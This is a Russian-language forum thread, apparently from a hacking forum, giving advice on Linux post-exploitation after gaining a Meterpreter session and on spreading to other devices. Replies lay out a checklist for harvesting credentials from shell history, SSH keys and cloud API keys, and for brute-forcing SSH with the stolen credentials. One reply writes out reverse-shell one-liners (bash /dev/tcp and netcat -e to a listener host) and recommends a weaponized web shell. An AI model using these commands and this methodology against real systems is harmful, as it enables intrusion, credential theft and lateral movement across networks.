Пост-эксплуатация

[k0priz]

Всем здраствуйте, в связи с недавними событиями в моей жизни понял что не силен в пост-эксплуатации linux x64. И хочу попросить совета у умных ребят на этом форуме.
Меня интересует пост эксплуатация через сесеию метерпретера на Linux x64 (CentOS, RedHatOS) что можете посоветовать или предложить? Особенно интересны аспекты распростонения на другие устройства.

 

[Эрмано]

Самое первое - LinPEAS, помогает обнаружить мисконфиги и другие уязвимости, которые можно использовать для LPE, потом если у тебя машина в FreeIPA(Container Services) например, то я переводил статьи в разделе сетей(там есть Lateral Movement - распространение на другие устройства). Это основы прям

 

[BLUA]

Всем здраствуйте, в связи с недавними событиями в моей жизни понял что не силен в пост-эксплуатации linux x64. И хочу попросить совета у умных ребят на этом форуме.
Меня интересует пост эксплуатация через сесеию метерпретера на Linux x64 (CentOS, RedHatOS) что можете посоветовать или предложить? Особенно интересны аспекты распростонения на другие устройства.

нужно писать конкретно что не получается(желательно со скринами)
и желательно делать это в соответствующей ветке, потому что есть ребята, которые
читают только "свою" ветку... больше ребят, которым интересна твоя тема, обитают в Уязвимость сетей,
так как они часто встречаются с тем что ты ищешь

 

[xargs]

Почему именно метерпретер? Его на линуксе редко кто использует, за ненадобностью. Выше посоветовали Linpeas но нужно понимать что любая тулза может давать фалсе-позитив результаты, поэтому первоначально я собираю информацию сам в ручную а потом уже тулзами.
Мой порядок действий примерно такой:
Смотрим пользователя, ядро, сетку, процессы, порты, всех пользователей.
id, uname -a, ip a, ps axfuw, ss -tulpn, /etc/passwd, /etc/hosts
Далее смотрим логи если доступны /var/log тут можно увидеть задачи крона, иногда даже пароли.
После логов смотрим крон задачи: ls -lha /etc/cron*
Смотрим общую папку конфигов /etc/ ищем конфиги доступные для записи.
Смотрим конфиги веб-сервера /etc/apache2 /etc/httpd/ /etc/nginx - определить местоположение можно из списка процессов, в конфигах могут быть интересные поддомены, домены, пароли.
работающие Докер контейнеры, можно определить по сетевым интерфейсам, внутри может быть что-то вкусное.
Если хостинг типа амазона у пользователя в хоум могут лежат АПИ ключи, часто у них супер права позволяющие покупать доп услуги и вообще все что угодно, например создать еще одного админа для всего AWS акканута.
Проверка SUID, SGID файлов, если сервер старенький 2-3 года можно бывает нарыть что нибудь.
Ядреные эксплойты: searchsploit linux kernel 2.6
В портах можно увидеть сервисы работающие только для локалки, сделать форвардинг и получить доступ к локальным службам.
Если на сервере нестандартный самописный софт можно его дебажить разными стандартными утилитами типа ldd, strace в софте иногда можно найти захардкоженые кредсы, но такое пока что я встречал только на разных КТФах.

Анализ домашних папок пользователей:
Проверяем пользователей на sudo -l
Проверяем файл .bashrc в нем могут быть прописаны кредсы в алиасах итд.
проверяем ключи в .ssh
проверяем историю в .bash_history и других history файлах.
Внимательно смотрим папку .config у пользователя.

ВСЕ собраные кредсы из сорцев, бд итд проверяем в других сервисах, натравливаешь гидру или legba с кредсами от БД например на SSH

В общем это я на скорую руку накидал что первое в голову пришло, тема очень обширная и сильно завязана на понимании самой ОС, если ты уверенный пользователь линукса тебе гараздо проще понять где может быть слабое звено. Я ради этого даже когдато сертификат получал системного администратора лет 10 назад.

Советую курить курс у оффсека PEN-200 или же пройти на трайхакми тоже есть пентестеские курсы и цена смешная, 15$/месяц

Полезные ссылки:

GTFOBins

gtfobins.github.io

GitHub - peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) - peass-ng/PEASS-ng

github.com

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

Monitor linux processes without root permissions. Contribute to DominicBreuker/pspy development by creating an account on GitHub.

github.com

GitHub - wagoodman/dive: A tool for exploring each layer in a docker image

A tool for exploring each layer in a docker image. Contribute to wagoodman/dive development by creating an account on GitHub.

github.com

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.

An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface. - nicocha30/ligolo-ng

github.com

GitHub - evilsocket/legba: The fastest and more comprehensive multiprotocol credentials bruteforcer / password sprayer and enumerator. 🥷

The fastest and more comprehensive multiprotocol credentials bruteforcer / password sprayer and enumerator. 🥷 - evilsocket/legba

github.com

GitHub - vanhauser-thc/thc-hydra: hydra

hydra. Contribute to vanhauser-thc/thc-hydra development by creating an account on GitHub.

github.com

 

[zdestuta]

Самое первое - LinPEAS, помогает обнаружить мисконфиги и другие уязвимости, которые можно использовать для LPE, потом если у тебя машина в FreeIPA(Container Services) например, то я переводил статьи в разделе сетей(там есть Lateral Movement - распространение на другие устройства). Это основы прям

+1 к LinPEAS
Ну и вот такая методичка тоже имеется, где частично написано как делать руками то что делает LinPEAS автоматически.

 

[k0priz]

Почему именно метерпретер

Я бы с удовольствием использовал что то другое, что можешь посоветовать?

 

[Эрмано]

Я бы с удовольствием использовал что то другое, что можешь посоветовать?

Можно sliver юзать

 

[xargs]

Я бы с удовольствием использовал что то другое, что можешь посоветовать?

да в линуксе пофиг что, вся загвоздка в работе с псевдотерминалами (pty) которые нужны для интерактивной оболочки для того чтоб ты мог использовать такие команды как sudo или ssh в общем все команды которые ждут ввода от пользователя (почти все) им нужен псевдотерминал как минимум. А его очень легко можно подключить через Python который сейчас предустановлен на всех дистрибутивах линукс.

import pty; pty.spawn("sh")

Так что берешь любой бэк-конект в зависимости от среды, интерпретатора вот тут: https://www.revshells.com/ и все.
Если нужно что-то короткое, когда ограничение по символам тогда:

sh -i >& /dev/tcp/10.10.10.10/9001 0>&1

если на таргете есть неткат:

nc 10.10.10.10 9001 -e sh

и так далее в зависимости от ситуации.

Для того чтоб получить псевдотерминал, после того как получил обратный конект просто команду:

python -c 'import pty; pty.spawn("bash")'

Если нужен более продвинутый функционал (который нахой ненужен как по мне) тогда можно заюзать weevely3 но нужно понимать что он не интерактивный, но в нем есть такие полезные фишки как например трансфер файлов

GitHub - epinna/weevely3: Weaponized web shell

Weaponized web shell. Contribute to epinna/weevely3 development by creating an account on GitHub.

github.com

Features​

• Shell access to the target
• SQL console pivoting on the target
• HTTP/HTTPS proxy to browse through the target
• Upload and download files
• Spawn reverse and direct TCP shells
• Audit remote target security
• Port scan pivoting on target
• Mount the remote filesystem
• Bruteforce SQL accounts pivoting on the target

Ну или метерпретер на крайняк. Есть еще варианты с полной эмуляцией терминала как в SSH, с авто-комлитом команд но ето уже как по мне дикий перебор я такими не пользуюсь под линукс, только под винду потому как в винде в powershell без автокомплита сложно с их километровыми параметрами

p.s. weevely3 для PHP только